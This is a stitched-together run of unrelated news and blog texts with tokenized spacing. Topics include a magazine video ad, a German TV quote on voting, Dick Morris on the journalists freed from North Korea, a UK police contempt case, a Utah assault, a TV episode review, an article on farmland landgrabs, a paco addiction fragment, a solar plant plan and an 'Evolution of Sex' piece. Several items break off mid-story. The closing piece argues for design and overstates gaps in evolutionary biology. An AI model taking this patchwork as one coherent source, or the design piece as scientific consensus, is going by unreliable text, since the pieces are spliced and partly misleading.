The promo itself will be in every copy , but the video portion only in some subscriptions delivered to New York and Los Angeles .
It was released Tuesday to media outlets .
Upon getting to the ad , there is a 5 - second delay before anything happens — there is enough on the page to probably hold the unassuming reader 's attention for that long , if nothing else the eerie stare from Neil Patrick Harris — and then a 5 - second still promo before the promo for the player 's developer , Americhip .
Next up is a pre-roll featuring a bespoke setup by three characters from the network 's hit Big Bang Theory sitcom .
" I weep for civilization , " opines Emmy - nominated Jim Parsons ( Sheldon Cooper ) at the end of the clip , scripted to reveal that the über nerd was tricked into appearing in an ad in Entertainment Weekly rather than " the current edition of Physics Today . "
As impressive as this step is , the true marriage of print and digital multimedia still seems quite far off , and eons away from the streaming updates in the newspapers of Minority Report fame .
Still , it is boldish , baby steps like this that bring about dramatic shifts in media .
That said , the logical extreme of the current wave of tech innovation heads more toward digital reproduction of a print experience , as the Kindle DX aspires to do for newspapers , rather than to ultrathin hardware pasted to paper .
In a more - limited context , is there much of a future for this branch ?
It 's an expensive undertaking , but it does seem well suited for milestone events like a new TV season or as part of a marketing blitz for a certain genre of movie — think a Watchman trailer in Entertainment Weekly .
Part of the lure of this technology as an advertising mechanism is that it adds a " medium is the message " value and thus reaps free publicity from stories like this .
But when the novelty wears off , and without serendipitous newsstand sales — which Entertainment Weekly will not benefit from this time around — there 's not nearly as much upside .
And therein lies the dilemma of even bothering to extend the digital experience into a bits medium :
In the end , how many people will actually see this rather than just hear about it ?
See Also :
Heu­te hören wir mal dem Ulrich Wickert zu , der uns in der gest­ri­gen Aus­ga­be von „ Mar­kus Lanz ” im ZDF erklärt , war­um es wich­tig ist , wäh­len zu gehen .
Als Bei­spiel nimmt er dabei die Pira­ten­par­tei und beschreibt in schö­nen ein­fa­chen Wor­ten , war­um eine Stim­me für die Pira­ten in kei­nem Fall eine ver­lo­re­ne Stim­me ist :
Ulrich Wickert : Es ist eine demo­kra­ti­sche Pflicht , zu Wahl zu gehen .
Wer nicht zur Wahl geht , darf nicht kri­ti­sie­ren .
Da bin ich auch ziem­lich humor­los , wenn Sie mir das ver­zei­hen .
Wenn
Sie sich angu­cken , es haben sich , glau­be ich , für die­se Bun­des­tags­wahl , es sind , glau­be ich , 29 ver­schie­de­ne Lis­ten zuge­las­sen wor­den , also man kann die Pira­ten­par­tei wäh­len , das Zen­trum , die ältes­te Par­tei über­haupt oder so wei­ter und so fort .
Die Wäh­ler haben in der Geschich­te der Bun­des­re­pu­blik gezeigt , dass sie etwas Poli­ti­sches ver­än­dern kön­nen , indem sie näm­lich lan­ge für eine Par­tei gestimmt haben , von der alle gesagt haben , die wird nie in den Bun­des­tag oder in die Land­ta­ge kom­men , das war eine Par­tei : Die Grü­nen .
Und dadurch , dass aber die Wäh­ler plötz­lich die Grü­nen gewählt haben , hat sich das gesam­te poli­ti­sche Bild geän­dert , die Par­tei­en haben sich ver­än­dert und unse­re Land­schaft hat sich ver­än­dert .
Also sage ich :
Wenn ich ein demo­kra­tisch den­ken­der Mensch bin , dann gehe ich wäh­len , und wäh­le irgend­je­mand , der mög­li­cher­wei­se die eta­blier­ten Par­tei­en ärgert .
Ich mache jetzt etwas – ent­schul­di­gen Sie – Kaba­ret­tis­ti­sches : Ich sage , die Pira­ten­par­tei bekommt 5,1 % .
Stel­len
Sie sich das mal vor !
Was für ein Ent­set­zen bei den eta­blier­ten Par­tei­en .
Aber dann haben die Wäh­ler wirk­lich was bewirkt .
Was Ent­setz­li­ches .
Ich wer­de die Pira­ten­par­tei nicht wäh­len , aber das ist nicht das Pro­blem . [… ]
Ich gehe davon aus , dass wir doch wie­der etwas um die 80 % Wahl­be­tei­li­gung haben wer­den .
Aber stel­len Sie sich mal vor , von den 20 % Nicht­wäh­lern [ … ] , die wäh­len nun plötz­lich zu 5,1 % die Pira­ten­par­tei .
Das wär ’ irre !
Advertisements
Today on FNC ’s Fox and Friends , Dick Morris claimed that freed Current TV journalists Laura Ling and Euna Lee should have stayed in N. Korea and dealt with the consequences of their actions .
He said , “ Maybe they go to North Korea and they live with the consequences of their decision to go there . ”
Here is the video courtesy of Media Matters :
Advertisements
Morris said , “ I think this is an awful idea of Bill Clinton ’s , and I feel badly for the two journalists , but what were they doing in N. Korea in the first place ?
… It ’s ridiculous to have done this . ”
When asked how the US should get the girls home , Morris answered , “ I do n’t know .
Maybe they do n’t come home .
Maybe they go to N. Korea and live with the consequences of their decision to go there .
The point is you do n’t give a rogue state like N. Korea the opportunity to rehabilitate its image globally simply to get two reporters out of jail and give the former president , the current president , and the Secretary of State a photo op . ”
Morris is echoing the failed Bush era policy on N. Korea , a policy which was such as a disaster that the Bush administration ended up going back to the Clinton policy .
Morris ’ idea that the journalists should have stayed in N. Korea is insane .
He is advocating that the United States government abandon its responsibility to protect its own citizens .
I do n’t see how the Obama administration helped to rehabilitate N. Korea ’s image .
The fact is that N. Korea still imprisoned two innocent journalists .
Taking a hard line stance with a desperate regime that has nothing to lose is a recipe for failure .
Some engagement with N. Korea is necessary , but I see this episode as separate from the overall U.S./N. Korea relationship .
The right wing is angry because they can’t handle any success that the Obama administration has .
No administration could afford the political fallout that would have come with the decision to leave the journalists in N. Korea .
This is just more empty tough talk designed to appeal to right wing that does n’t take into account the realities of the situation in North Korea .
Colin Port outside the high court .
Photograph : John Stillwell / PA
A chief constable was criticised by three judges today for defying a high court order to return computer hard drives containing evidence of suspected child abuse to an expert witness .
Colin Port , the chief constable of Avon and Somerset police , escaped a prison term for contempt of court because he returned the files from 87 computer hard drives to the expert yesterday evening , hours before the officer appeared at the Royal Courts of Justice in London .
Although they dismissed the contempt of court action against him the three senior judges said Port 's actions in defying the order " gave grounds for concern " .
The case pitted the chief constable against Jim Bates , a forensic computer analyst , who since the 1990s has been used by police and defence lawyers in paedophile cases .
Bates said the contents of the computer hard drives and hundreds of photographs which were seized were all related to his work as an expert witness .
He claims that Port and other senior police officers involved in child protection are engaged in a campaign to discredit him because he continues to expose serious flaws in Operation Ore , Britain 's biggest online paedophile investigation .
Last year Bates was found guilty of falsifying his qualifications by saying he held a bachelor of science degree when he did not .
" I have been subjected to intimidation , bullying and even threats of violence by police and some of their misguided supporters , " Bates said in court documents .
But as he escaped prisontoday Port was defiant .
Outside the court he called upon Bates to destroy all the material which had been returned and said the case raised concerns about who was allowed access to highly sensitive material .
" Each time these images are viewed it is a fresh victimisation of the child , " he said .
" Tighter governance is crucial .
We need a nationwide accreditation system with clear rules and safeguarding of victims and a fail - safe that allows accreditation to be withdrawn should any aspect of those rules be breached . "
Bates , who has been credited as a world - renowned expert in forensic computer analysis , became the focus of a police inquiry last year when he acted in the case of a Bristol man accused of possessing paedophile images .
He was arrested last September on suspicion of conspiracy to possess indecent images of children .
His home was searched and 87 computer hard drives and several hundred photographs of children were seized .
The police claimed Bates had 2,500 photographs of children in his possession .
He disputes that , saying there were only about 250 pictures , all relating to historic cases which the police had knowledge of .
Bates challenged the search and seizure at a judicial review and said the material was legally restricted , professionally confidential and required for his work as a defence expert .
In May the high court ruled in his favour saying the search was unlawful and ordered Port to return the material .
But Port refused , saying that the public would not understand a police officer handing back images of suspected child abuse during an investigation .
Bates , who is acting in two forthcoming appeals against conviction in the Ore investigation , has suggested that 85 % of the convictions are unsafe because of " massive evidence of credit card fraud " .
Operation
Ore was launched in 2002 after the credit card details of 7,200 people believed to have paid for paedophile images on the internet were supplied to the British police by US investigators .
More than 2,000 individuals have been convicted as part of the inquiry .
Police suspected those on the list of having paid for access to images of children being abused through a website called Landslide , which provided access to 300 adult sites .
But Bates and others say the inquiry was seriously flawed , and said many people on the list were victims of credit card fraud .
In the United States only a small proportion of those on the list were convicted .
In his affidavit Bates said : " My investigation revealed … massive evidence of credit card fraud within the database ( Landslide ) and conclusive evidence of breathtaking incompetence in the prosecution 's expert analyses of how this database had been generated and maintained . "
Senior officers involved in Ore are also facing a class action from former suspects who claim their lives have been ruined as a result of a flawed investigation .
In their judgment Lord Justice Stanley Burnton , Mr Justice Wilkie and Mr Justice Calvert Smith criticised Port for attempting to smear Bates in a series of newspaper articles " all of which were directed to bring Bates into disrepute as a result of suggestions that there was salacious material which he had on computers otherwise than for purely professional purposes " .
They refused to grant Port 's legal team costs .
Bates said he would be pursuing a case for damages against the force and Port .
OREM , Utah , Aug. 18 ( UPI ) -- Police in Utah said a man arrested for attacking his nephew and his wife was upset by a game of UNO .
Orem police said the 58 - year - old man was in his home drinking and playing the card game with his 47 - year - old nephew and the nephew 's 64 - year - old wife at about 10:30 p.m .
Saturday when he allegedly became agitated and smacked the woman on the back of her head , The Salt Lake Tribune reported Tuesday .
Advertisement
Lt. Gary Downey said the nephew and his wife gathered their belongings to leave , but the man grabbed his nephew 's arm and punched him .
He said the pair fought until the man threatened the couple with a knife and ordered them to leave .
The suspect was arrested on suspicion of aggravated assault and three outstanding warrants for aggravated assault , simple assault and driving under the influence .
This week , the producers went for a little more emotion than normal , and still kept up the action and dialogue .
This had by far a more adult feel to it though the visual effects looked childish .
After my little rant last week about how weak the procedural part of the show was , I really do n't care .
If I want to watch a procedural , I 'll watch Criminal Minds .
That 's why I 'll gloss over the plot details and jump into the reviewable stuff .
The artifact of the week is the Spine of the Saracen .
This crazy thing latches on to people 's spines and uses their electrical charge to kill other people until the host is drained .
Pete and Myka go to a site with charred bodies and find an old Warehouse agent .
This leads them to another Warehouse agent , Rebecca Sinclair , who had been living in St. Louis after her partner ( the body ) went missing .
As the team tracks down the artifact through a few more charred bodies , it actually latches onto Pete .
There was no real danger as always ( he is the main character and Joss Whedon is n't the creator ) , but I felt more tension than in the previous episodes .
Joanne Kelly and Eddie McClintock did a great job in this episode conveying the emotions .
In the end , Pete attaches cables to himself , hooks himself to the generator , and shocks himself .
Pete survives and the artifact is destroyed .
There was an underlying story with Rebecca and her former partner , Jack .
They were in love , but Jack loved the Warehouse more .
Jack had sealed himself with the artifact to keep it from everyone else .
There is a heartwarming scene in which they take Rebecca to Jack 's room which is still preserved as Warehouse protocol , and finds an engagement ring .
Rebecca gives a cryptic warning to Myka , saying that the Warehouse is like the spine , it will use her up .
There was lots of fun moments in which Claudia and Artie clashed over old vs. new and it looks like Claudia has the upperhand .
She rigged a contraption that gives good Bones - esque holograms on bodies from just pictures and even clearer ones from the body .
I would like to see an episode where Myka and Pete are in the Warehouse and Claudia is out doing something .
There 's nothing wrong with an episode where Claudia is out getting a drink or something , and she thinks she sees something Warehouse worthy and follows some clues .
From the scenes in which Claudia talks to herself , there 's plenty of laughs that can come from Claudia working by herself .
The artifact finding was still severely deficient and there was one instance that the clue was so obvious it was almost absurd Myka and Pete skipped it .
There were plenty of plot holes , and the Spine was n't fully explained , but like I 've said , I do n't care anymore .
The producers do n't read this blog and probably do n't care what I think .
Score : 8.7/10
Thousand of protesters took to the streets , waving the orange flags of the opposition .
Before long , looting began .
Buildings were set on fire .
But the turning point came when a crowd moved from the main square towards the presidential palace .
Amid the confusion , someone panicked and gave the order to the troops guarding the palace to open fire .
Scores died .
The leaders of the army decided they'd had enough and stormed the palace , causing the president to flee .
A typical African coup d'état ?
Not quite .
Certainly there were allegations of corruption in high places .
The president had bought a private jet – from a member of the Disney family – for his own personal use .
He was accused of unnecessary extravagance , of mismanaging public funds and confusing the interests of the state with his own .
But something else had whipped up the protesters in Antananarivo , the capital of Madagascar , earlier this year , when the government of Marc Ravalomanana was overthrown in the former French colony .
The urban poor were angry at the price of food , which had been high since the massive rise in global prices of wheat and rice the year before .
Food - price rises hit the poor worse than the rest of us because they spend up to two - thirds of their income on food .
But what whipped them into action was news of a deal the government had recently signed with a giant Korean multinational , Daewoo , leasing 1.3 million hectares of farmland – an area almost half the size of Belgium and about half of all arable land on the island – to the foreign company for 99 years .
Daewoo had announced plans to grow maize and palm oil there – and send all the harvests back to South Korea .
Download the new Independent Premium app Sharing the full story , not just the headlines
Terms of the deal had not originally been made public .
But then the news leaked , via the Financial Times in London , that the firm had paid nothing for the lease .
Daewoo had promised to improve the island 's infrastructure in support of its investment .
" We will provide jobs for them by farming it , which is good for Madagascar , " a Daewoo spokesman said .
But the direct cash benefit to Madagascar would be zero – in a country which can barely produce enough food to feed itself : nearly half of the island 's children under the age of five are malnourished .
The government of President Ravalomanana became the first in the world to be toppled because of what the United Nations ' Food and Agriculture Organization recently described as " landgrabbing " .
The Daewoo deal is only one of more than 100 land deals which have , over the past 12 months , seen massive tracts of cultivable farmland across the globe bought up by wealthy countries and international corporations .
The phenomenon is accelerating at an alarming rate , with an area half the size of Europe 's farmland targeted in just the past six months .
To understand the impotent fury that provokes in impoverished farmers , consider the reaction if something similar happened in Britain .
The international development policy consultant Mark Weston has a vivid image to help : " Imagine if China , following a brief negotiation with a British government desperate for foreign cash after the collapse of the economy , bought up the whole of Wales , replaced most of its inhabitants with Chinese workers , turned the entire country into an enormous rice field , and sent all the rice produced there for the next 99 years back to China , " he suggests .
" Imagine that neither the evicted Welsh nor the rest of the British public knew what they were getting in return for this , having to content themselves with vague promises that the new landlords would upgrade a few ports and roads and create jobs for local people .
" Then , imagine that , after a few years – and bearing in mind that recession and the plummeting pound have already made it difficult for Britain to buy food from abroad – an oil - price spike or an environmental disaster in one of the world 's big grain - producing nations drives global food prices sharply upwards , and beyond the reach of many Britons .
While the Chinese next door in Wales continue sending rice back to China , the starving British look helplessly on , ruing the day their government sold off half their arable land .
Some of them plot the violent recapture of the Welsh valleys . "
Change the place names to Africa and the scenario is much less far - fetched .
It is happening already , which is why many , including Jacques Diouf , head of the United Nations Food and Agriculture Organization , has warned that the world may be slipping into a " neo-colonial " system .
Even that great champion of the free market , the FT , described the Daewoo deal as " rapacious " and warned it is but the most " brazen example of a wider phenomenon " as rich nations seek to buy up the natural resources of poor countries .
The extent of this new colonialism is vast .
The buyers are wealthy countries that are unable to grow their own food .
The Gulf states are at the forefront of new investments .
Saudi Arabia , Bahrain , Kuwait , Oman , Qatar – which between them control nearly 45 per cent of the world 's oil – are snapping up agricultural land in fertile countries such as Brazil , Russia , Kazakhstan , Ukraine and Egypt .
But they are ' also targeting the world 's poorest countries , such as Ethiopia , Cameroon , Uganda , Zambia and Cambodia .
The amounts of land involved are staggering .
South Korean companies have bought 690,000 hectares in Sudan , where at least six other countries are known to have secured large land - holdings – and where food supplies for the local population are among the least secure anywhere in the world .
The Saudis are negotiating 500,000 hectares in Tanzania .
Firms from the United Arab Emirates have landed 324,000 hectares in Pakistan .
But they are not the only buyers .
Countries with large populations such as China , South Korea and even India are acquiring swathes of African farmland to produce food for export .
The Indian government has lent money to 80 companies to buy 350,000 hectares in Africa and recently lowered the tariffs under which Ethiopian agri-products can enter India .
One of the biggest holdings of agriculture land in the world is a Bangalore - based company , Karuturi Global , which has recently bought huge areas in Ethiopia and Kenya .
Food is not all the new colonialists are after .
About a fifth of the massive new deals are for land on which to grow biofuels .
British , US and German companies with names such as Flora Ecopower have bought land in Tanzania and Ethiopia .
The country whose name became a byword for famine at the time of the Live Aid concerts has had more than 50 investors sign deals or register an interest in the cultivation of biofuel crops on its soil .
From Ethiopia 's point of view , the economic logic is straightforward : the country is an importer of oil and is therefore vulnerable to price fluctuations on the world market ; if it can produce biofuels it will lessen that dependency .
But at a cost .
To keep the foreign biofuel investors happy , the government does n't force any companies to carry out environmental impact assessments .
Local activists claim that 75 per cent of the land allocated to foreign biofuel firms are covered in forests that will be cut down .
More worrying is the plan by a Norwegian biofuel company to create " the largest jatropha plantation in the world " by deforesting large tracts of land in northern Ghana .
Jatropha , which can be cultivated in poor soil , produces oily seeds that can produce biodiesel .
A local activist , Bakari Nyari , of the African Biodiversity Network , has accused the company of " using methods that hark back to the darkest days of colonialism ... by deceiving an illiterate chief to sign away 38,000 hectares with his thumbprint " .
The company claims the scheme will bring jobs , but the extensive deforestation which would result would deprive local people of their traditional income from gathering forest products such as shea nuts .
The failed Daewoo land deal in Madagascar may have been intended to be the biggest landgrab planned to date , but it is far from the only one .
So what is the cause of this sudden explosion of land acquisition across the globe ?
It has its roots in the food crisis of 2007 / 8 , when prices of rice , wheat and other cereals skyrocketed across the world , triggering riots from Haiti to Senegal .
The price spike also led food - growing countries to slap export tariffs on staple crops to minimise the amounts that left their countries .
That tightened the supply still further , meaning food prices were driven up more by a situation of policy - created scarcity than by supply and demand .
This situation also made many rich countries that are reliant on massive food imports question one of the fundamentals of the global economy : the idea that every country should concentrate on its best products and then trade .
Suddenly having unimaginable quantities of cash from oil was not enough to guarantee you all the food you needed .
The oil sheikhs of the Gulf states found that food imports had doubled in cost over less than five years .
In the future it might get even worse .
You could no longer rely on regional and global markets , they concluded .
The rush to grab land began .
The logic was clear .
The highly populous South Korea is the world 's fourth - biggest importer of maize ; the Madagascar deal would replace about half of Korea 's maize imports , a Daewoo spokesman boasted .
The Gulf states were equally open : control of foreign farmland would not only secure food supplies , it would eliminate the cut taken by middlemen and reduce its food - import bills by more than 20 per cent .
And the benefits could only increase .
The fundamental conditions that had led to the global food crisis were unchanged , and might easily worsen .
The UN predicts that by 2050 , the world population will have grown by 50 per cent .
Growing the food to feed nine billion people will place enormous pressure on the Earth , eroding soils , denuding forests and draining rivers .
Climate change will make all that worse .
Oil prices will continue to rise , and with them the cost of fertiliser and tractor fuel .
Demand for biofuels would further cut land available for food crops .
The 2007 / 8 price crunch might just be a foretaste of something worse .
The times of plenty are already over .
Next , there might not be enough food to go round , even for those with lots of money .
We have not really noticed it here , because the UK , like the US , still instinctively seems to place unlimited faith in the ability of the market to provide .
But other countries have begun to devise a long - term strategic response .
The clearest public sign of that came in June when , just before the meeting of world leaders at the G8 in Italy , the Japanese prime minister , Taro Aso , asked : " Is the current food crisis just another market vagary ? "
He replied to his own question : " Evidence suggests not ; we are undergoing a transition to a new equilibrium , reflecting a new economic , climatic , demographic and ecological reality . "
But the market is having its say , too : the cost of land is rising .
Prices have jumped 16 per cent in Brazil , 31 per cent in Poland , and 15 per cent in the midwestern United States .
Veteran speculators such as George Soros , Jim Rogers and Lord Jacob Rothschild are snapping up farmland right now .
Rogers – who between 1970 and 1980 increased the value of his equities portfolio by 4,200 per cent , and who made another fortune predicting the commodities rally in 1999 – last month said : " I 'm convinced that farmland is going to be one of the best investments of our time . "
After the disastrous involvement of financial speculators in housing – the global recession had its roots in the development of mortgage - based derivatives – it is hardly reassuring that the same financial whiz - kids are turning to land as a new source of profit .
" The food and financial crises combined , " says the Philippines - based food lobby group Grain , " have turned agricultural land into a new strategic asset . "
In one way , that ought to be a good thing for poor countries .
Land is what they have in plenty .
And the agricultural sector in developing countries is in urgent need of capital .
Aid once provided this , but the share of that which goes to farming fell from $ 20 bn a year in the 1980s to just $ 5bn a year in 2007 , according to Oxfam .
A mere 5 per cent of aid now goes to rural - development agriculture , even though in the poorest places such as Africa , more than 70 per cent of the population rely on farming for their income .
Decades of low investment have meant stagnating production and productivity .
Landgrab deals ought , at least , to rectify that by injecting much - needed investment into agriculture in these countries .
That ought to bring new jobs and a steady income to the rural poor .
It should bring new technology and know - how to local farmers .
It should develop rural infrastructure , such as roads and grain - storage systems , to the good of the entire community .
It should build new schools and health posts that will benefit all .
It should give African governments much - needed taxes to invest in developing their countries .
All of which should lessen dependency of food aid .
Landgrabs should produce a win -win situation .
That was the kind of big billing which the government in Kenya gave to the deal it did recently with the state of Qatar .
Just one per cent of land in the Arab emirate is cultivable , so Qatar is heavily reliant on food imports .
The deal was that Qatar would get 40,000 hectares of land to grow food in return for building a $ 2.5 bn deep - water port at Lamu in Kenya .
Unfortunately , even as the negotiations with Qatar proceeded , the Kenyan government was forced to announce a state of emergency because a third of Kenya 's population of 34 million was facing food shortages .
President Mwai Kibaki declared the situation a national disaster and appealed for international food relief .
Hungry voters often fail to understand the long - term attractions of the economic advantages which could be brought to Kenya by creating what would be only its second deep - water port and opening up a third of the country – in the arid and neglected north - east – to development .
This is a country , after all , where people kill for land , as was shown after the botched elections in 2007 .
If the world food crisis tightens , as everyone seems to predict , it will become ever more unpalatable politically for a government such as Kenya's to countenance the massive export of food at a time of shortage .
That is even more true in a continent as politically unstable as Africa .
There is , in any case , already fierce opposition from many to projects like this .
The land offered to Qatar is in the Tana River delta .
It is fertile with abundant fresh water but it is home to 150,000 farming and pastoralist families who regard the land as communal and graze 60,000 cattle there .
They have threatened armed resistance .
They are supported by opposition activists , who object less to the land being developed , but want it to grow food for hungry Kenyans .
Then there are the environmentalists , who say a pristine ecosystem of mangrove swamps , savannah and forests will be destroyed .
The environment is another major worry in many of the great rash of land deals .
Growing food crops in huge plantations is dominated by large - scale intensive monoculture production using large quantities of fertiliser and pesticides .
The results are spectacular at first – which might satisfy the yen of the outside investors for short - term profit .
But it risks damaging the long - term sustainability of tropical soils unsuited for intensive cultivation and can do serious damage to the local water table .
It reduces the diversity of plants , animals and insect life and threatens the long - term fertility of the land through soil erosion , waterlogging or increased salinity .
The intensive use of agrochemicals could lead to water - quality problems , and irrigating the land - holdings of foreign investors may take water away from other users .
Water is a key issue .
In a sense , these are n't landgrabs so much as water grabs , suggests the chief executive of Nestlé , Peter Brabeck - Letmathe .
With the land comes the right to draw the water beneath it , which could be the most valuable part of the deal .
" Water withdrawals for agriculture continue to increase rapidly .
In some of the most fertile regions of the world ( America , southern Europe , northern India , north - eastern China ) , over - use of water , mainly for agriculture , is leading to sinking water tables .
Groundwater is being withdrawn , no longer as a buffer over the year , but in a structural way , mainly because water is seen as a free good . "
The world needs to begin to think more urgently about water .
The average person in the world uses between 3,000 and 6,000 litres a day .
Barely a tenth of that is used for hygiene or manufacturing .
The rest is used in farming .
And the world 's lifestyle , with factors such as increased meat - eating , is exacerbating the problem .
Meat requires 10 times more water per calorie than plants .
Biofuels are one of the most thirsty products on the planet ; it takes up to 9,100 litres of water to grow the soya for one litre of biodiesel , and up to 4,000 litres for the corn to be transformed into bioethanol .
" Under present conditions , and with the way water is being managed , " the Nestlé chief says , " we will run out of water long before we run out of fuel " .
Indeed , in many places underground , aquifers are falling ; in some regions by several metres a year .
Rivers are running dry due to over -use .
And the worst problems are in some of the world 's most important agricultural areas .
If current trends hold , Frank Rijsberman of the International Water Management Institute has warned , soon " we could be facing annual losses equivalent to the entire grain crops of India and the US combined " .
Between them , they produce a third of all the world 's cereals .
Is there a way forward ?
The Washington - based International Food Policy Research Institute believes so .
It has recently produced a report containing recommendations for a binding code of conduct to promote what Japan , the world 's largest food importer , called for at the G8 in Italy – responsible foreign investment in agriculture in the face of the current pandemic of landgrabs .
It wants a code " with teeth " to ensure that smallholders being displaced from their land can negotiate mutually beneficial terms with foreign governments and multinationals .
It wants measures to enforce any agreement , if promised jobs , wage levels or local facilities fail to materialise .
It wants transparency , and it wants legal action in their home countries against firms that use bribes , rather than relying on prosecutions in the Third World .
It wants respect for existing land rights – not just those which are written , but those which exist through custom and practice .
It wants compulsory sharing of benefits , so that schools and hospitals get built and those living in areas around landgrabs get properly fed .
It suggests shorter - term leases to provide a regular income to farmers whose land is taken away for other uses .
Or , better still , it would like to see contract farming that leaves smallholders in control of their land but under contract to provide to the outside investor .
It demands proper environmental impact assessments .
And it says foreign investors should not have a right to export during an acute national food crisis .
No one is fooled that this will be easy .
The local elites in developing countries have a vested interest in the lucrative deals on offer .
The government in Cambodia has massively promoted landgrabbing , taking advantage of the fact that many land titles were destroyed under the terror of the Khmer Rouge .
Mozambique has signed a $ 2bn deal that will involve 10,000 Chinese " settlers " on its land in return for $ 3 m in military aid from Beijing .
The strategic considerations are clear .
" Food can be a weapon in this world , " as Hong Jong - wan , a manager at Daewoo , put it .
But things are ratcheting up on the other side , too .
Landgrabs are " a grave violation of the human right to food " , in the words of Constanze von Oppeln of the big German development agency Welthungerhilfe , one of the most prominent campaigners in the field .
She speaks for many who have no voice internationally – although they are making their presence felt well enough in their own countries .
A huge public outcry erupted in Uganda when its government began talking to Egypt 's ministry of agriculture about leasing nearly a million hectares to Egyptian firms for the production of wheat and maize destined for Cairo .
Mozambicans have similarly resisted the settlement of the thousands of Chinese agricultural workers on its leased lands .
Earlier this year , angry Filipinos successfully blocked a deal by the Philippines government with China which involved an astounding 1,240,000 hectares .
And last month the same activists exposed what they call a " secret agricultural pact " between their government and Bahrain .
With 80 per cent of the 90 million population landless , the deal is " unlawful and immoral " , activists there say .
Food touches something very deep in the human psyche .
Do not expect either side to give up without a fight .
BUENOS AIRES 
The homecoming did not go as Pablo Eche had dreamed .
After 15 months in a rehabilitation clinic battling his addiction to paco , a highly addictive drug that has laid waste to thousands of lives in this country , Mr. Eche returned to Ciudad Oculta , a poor neighborhood on the outskirts of this city .
Family members , including his mother , Bilma Acuña , an anti-paco community advocate , welcomed him back last October .
But their love was not enough .
Within weeks , overcome by depression over his failure to find a job that could support his son and daughter , he once again turned to the drug for solace .
Barefoot and shirtless , his ribs poking out of his thin torso , he shuffled about in red soccer shorts in the diner with a bare concrete floor run by his family .
World 's Largest Solar PV Plant to Be Built in Washington State
July 9th , 2009 by Timothy B. Hurst
75 - megawatt solar plant would also create hundreds of new green jobs
Not all of the big solar projects coming down the pike in the West will be on public land .
A team of private investors today announced plans to build a solar photovoltaic plant in the state of Washington that would be the largest of its kind in the world .
The 75 - megawatt Teanaway Solar Reserve will be located on 400 acres of formerly - logged private property four miles north of Cle Elum , in Kittitas County , Washington .
If built , the plant would generate enough power for an estimated 75,000 homes .
Currently , the largest solar photovoltaic plant in the world is a 60 - megawatt facility in Spain .
[ social_buttons ]
Teanaway has not secured power purchase agreements with the major electricity providers , but project developers are confident they will find a buyer .
Howard Trott , Managing Director and principal investor for the Teanaway Solar Reserve , said “ We ’ve had very good meetings with local utilities . ”
After a pre-application meeting with Kittitas County officials yesterday , Trott said the timeline on construction of the manufacturing plant and the power plant totals about 18 months .
Joined by Senator Maria Cantwell on a call with reporters Thursday , Trott explained that the Teanaway project would be different in that both the manufacturing and power generation are local .
The end benefit for the area would thus not only be a new solar power plant , but hundreds of new manufacturing and engineering jobs .
Thursday ’s announcement won immediate endorsement from Sen. Maria Cantwell ( D - WA ) .
Cantwell said the move , “ Positions our state as a major player in a $ 6 trillion export industry and makes Washington the second largest solar producer by megawatts behind California . ”
Sourcing both the panels and inverters locally would also save on transportation and packaging costs , said Trott .
“ To get our order we are going to make manufactures come to us , but we are going to help them by getting the facilities they need to do that . ”
Although they have n’t secured an agreement with a manufacturer yet , Trott said , “ We feel like we have great purchasing power . ”
In terms of preferred technology for the project , solar crystalline versus thin film technologies are both being weighed as options , but project developers said they would ideally like to source locally .
“ We are blessed in that we are in a state that is one of the largest producers of silicon , ” said Trott .
But the dedication to locally - sourced silicon will have to be weighed against the lower - priced thin film technologies , which are coming in at about $ 2 per watt , according to Trott .
Project planners said the 75 - megawatt , $ 100 million Teannaway Solar Reserve will be online by 2011 .
Image via An - tonio under a Creative Commons License
Appreciate CleanTechnica ’s originality ?
Consider becoming a CleanTechnica member , supporter , or ambassador — or a patron on Patreon .
Sign up for our free daily newsletter or weekly newsletter to never miss a story .
Have a tip for CleanTechnica , want to advertise , or want to suggest a guest for our CleanTech Talk podcast ?
Contact us here .
Latest Cleantech Talk Episode
Evolution of Sex
Evolution of Sex – The dilemma
The origin and subsequent maintenance of sex and recombination is a phenomena not easily explained by Darwinian evolution .
Evolutionary mechanisms such as natural selection are not able to reveal why organisms should abandon asexual reproduction in favor of more costly and inefficient sexual reproduction .
In his book , “ The Masterpiece of Nature : The Evolution of Genetics and Sexuality ” , Graham Bell described the dilemma in the following manner :
“ Sex is the queen of problems in evolutionary biology .
Perhaps no other natural phenomenon has aroused so much interest ; certainly none has sowed as much confusion .
The insights of Darwin and Mendel , which have illuminated so many mysteries , have so far failed to shed more than a dim and wavering light on the central mystery of sexuality , emphasizing its obscurity by its very isolation . ”
Evolution of Sex –
The move to sexual reproduction
Most single - celled organisms reproduce asexually .
Asexual reproduction is the formation of new individuals from cells of only one parent , without gamete formation or fertilization by another member of the species .
If life on earth is derived entirely from these single - celled creatures then why was this simple - yet - efficient method of asexual reproduction set aside in favor of sexual reproduction ?
Why does sex exist ?
In his book “ Evolution : The Triumph of an Idea , ” Carl Zimmer concedes :
“ Sex is not only unnecessary , but it ought to be a recipe for evolutionary disaster .
For one thing , it is an inefficient way to reproduce …
And sex carries other costs as well …
By all rights , any group of animals that evolves sexual reproduction should be promptly outcompeted by nonsexual ones .
And yet sex reigns …
Why is sex a success , despite all its disadvantages ? ”
From the perspective of evolutionary biology , sex is without question ‘ an inefficient way to reproduce . ’
Consider all that the sexual process entails , including the complexity involved in reproducing the information carried within the DNA .
From an evolutionary point of view , sex would be considered an absurdity .
Yet from a design point of view , it is nothing short of incredible !
Besides the difficulties associated with the sheer rarity of beneficial mutations and their much - more frequent cousins , the harmful deleterious mutations , there is the added problem related to the two different types of cell division ( mitosis and meiosis ) .
During mitosis , all of the chromosomes are copied and passed on from the parent cell to the daughter cells .
Conversely , meiosis occurs only in sex cells ( i.e. sperm and eggs ) .
During the latter type of replication , only half of the chromosomal material is copied and passed on to the subsequent generation .
Meiosis results in the production of completely new combinations of the parental genes , all of them uniquely different genotypes .
These , in turn , produce unique phenotypes , providing unlimited new material for the process of natural selection .
It is those very facts ( that meiosis has allegedly evolved the ability to halve the chromosome count -- but only for gametes -- and that it can actually provide unlimited new material ) which make the meiotic process so incredible .
The mechanism of meiosis is critical for sexual reproduction .
Yet meiotic sex is alleged to have evolved 520 million years ago .
How could the bacteria that are supposed to be responsible for the evolution of sex have stabilized a billion years ago , and then 500 million years after the stabilization , mutate enough to ‘ evolve ’ the painstaking process of meiosis ?
As yet , evolutionary biologists have been unable to come up with a single adequate explanation as to how somatic cells reproduce by mitosis ( thereby maintaining the species ’ standard chromosome number in each cell ) , while gametes are produced by meiosis -- wherein that chromosome number is halved so that , at the union of the male and female gametes during reproduction , the standard number is reinstated .
Evolution of Sex – Conclusion
